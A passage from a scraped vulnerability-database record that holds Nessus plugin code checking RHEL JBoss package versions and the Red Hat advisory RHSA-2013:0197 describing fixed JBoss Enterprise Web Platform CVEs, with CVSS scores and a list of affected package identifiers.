reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-common-core-2.2.21-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-jpa-deployers-1.0.0-6.1SP2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"jboss-naming-5.0.3-5.1.CP02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-docs-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-examples-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-5.2.0-8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-client-5.2.0-8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-tp-licenses-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-web-ws-native-5.2.0-8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-ws-cxf-ewp-5.2.0-7.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbosssx2-2.0.5-8.SP3_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jgroups-2.6.22-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-as-5-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-federation-2.1.5-3.ep5.el5\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-ewp-docs-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rh-ewp-docs-examples-5.2.0-6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"wss4j-1.5.12-4.1_patch_02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"xml-security-1.5.1-2.ep5.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:47:49", "description": "Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. 
As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. 
(CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 4 : JBoss EWP (RHSA-2013:0197)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", 
"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", 
"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas-web", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", 
"p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", 
"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2013-0197.NASL", "href": "https://www.tenable.com/plugins/nessus/78947", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0197. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78947);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0197\");\n\n script_name(english:\"RHEL 4 : JBoss EWP (RHSA-2013:0197)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple\nsecurity issues, various bugs, and add several enhancements are now\navailable for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
